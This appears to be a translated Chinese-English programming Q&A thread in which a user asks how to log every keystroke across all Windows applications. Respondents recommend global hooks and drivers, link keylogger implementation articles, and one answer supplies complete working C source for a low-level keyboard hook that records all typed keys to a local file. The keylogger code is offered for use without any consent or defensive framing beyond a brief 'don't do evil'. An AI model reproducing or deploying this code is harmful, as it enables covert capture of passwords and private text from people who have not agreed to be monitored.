记录用户在所有应用程序中按下的所有键 [英] Log all keys pressed by user in all applications

问题描述

我要记录用户在所有应用程序中按下的所有键....(捕获消息WM_CHAR)....

是钩WM_CHAR是解决方案吗?文档的任何链接???

I want to log all keys pressed by user in all applications.... (Catch message WM_CHAR)....

Is hooking WM_CHAR is that solution?? Any link of documentation???

can any one help me?

推荐答案

除了全局挂钩之外，使用驱动程序也是一种很好的做法，但是有很多地方可以放入过滤器.更多这些: http://www.securelist.com/zh-CN/analysis/204792178/Keyloggers_Implementing_keyloggers_in_Windows_Part_Two [ ^ ]

或者: http://www.refog. hu/hardware-keylogger/key-logging-without-software-or-drivers.html?& t = KGRwMApWX19uZXdwCnAxClYwCnAyCnMu [

Besides global hooks its a good practice to use a driver, but there are so many points where you can put your filter in. More these: http://www.securelist.com/en/analysis/204792178/Keyloggers_Implementing_keyloggers_in_Windows_Part_Two[^]

Alternatively: http://www.refog.hu/hardware-keylogger/key-logging-without-software-or-drivers.html?&t=KGRwMApWX19uZXdwCnAxClYwCnAyCnMu[^]

解决方案正在使用全局Windows Hook；使用全局"是重要的关键.请参阅:
http://msdn.microsoft.com/zh-我们/library/windows/desktop/ms632589%28v=vs.85%29.aspx [

The solution is using a global Windows Hook; using "global" is an important key. Please see:
http://msdn.microsoft.com/en-us/library/windows/desktop/ms632589%28v=vs.85%29.aspx[^].

Make sure you don''t do evil!

—SA

这是我前一段时间写的一个简单的键盘记录程序:

Here is a simple keylogger I wrote a while ago:

#include <windows.h>

#define LOG_PATH "log.txt"

HANDLE hFile;
HHOOK hHook;

LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam);

INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE HHGG, LPSTR lpCmdLine, int nShowCmd)
{

    LPTSTR lpFileName = TEXT(LOG_PATH);

    hFile = CreateFile(lpFileName, GENERIC_WRITE | GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
        return(1);

    hHook   = SetWindowsHookEx(WH_KEYBOARD_LL, MessageProc, NULL, 0);
    if(hHook == NULL)
        return(2);

    while( GetMessage(NULL, NULL, 0, 0) > 0 );

    return(0);

}

LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    KBDLLHOOKSTRUCT kbdllhookstruct;
    BYTE keyState[256];
    TCHAR buff[256] = {0};
    HWND hWnd;
    DWORD dwThreadId;
    HKL hKl;
    DWORD lpNumberOfBytesWritten;

    if(LOWORD(wParam) != WM_KEYDOWN)
        return CallNextHookEx(hHook, nCode, wParam, lParam);

    kbdllhookstruct = *((KBDLLHOOKSTRUCT *) lParam);

    GetKeyboardState(&keyState[0]);
    keyState[VK_SHIFT]      = (BYTE) GetKeyState(VK_SHIFT);
    keyState[VK_CAPITAL]    = (BYTE) GetKeyState(VK_CAPITAL);
    keyState[VK_CONTROL]    = (BYTE) GetKeyState(VK_CONTROL);

    hWnd = GetForegroundWindow();
    if(hWnd == NULL)
        ExitProcess(3);

    dwThreadId = GetWindowThreadProcessId(hWnd, 0);
    hKl = GetKeyboardLayout(dwThreadId);
    ToUnicodeEx(kbdllhookstruct.vkCode, kbdllhookstruct.scanCode, &keyState[0], &buff[0], 256, 0, hKl);
    WriteFile(hFile, &buff[0], sizeof(TCHAR) * lstrlen(&buff[0]), &lpNumberOfBytesWritten, NULL);

    return CallNextHookEx(hHook, nCode, wParam, lParam);
}

为了理解它，请从 SetWindowsHookEx [ ^ ]

In order to understand it, start with SetWindowsHookEx[^]

这篇关于记录用户在所有应用程序中按下的所有键的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！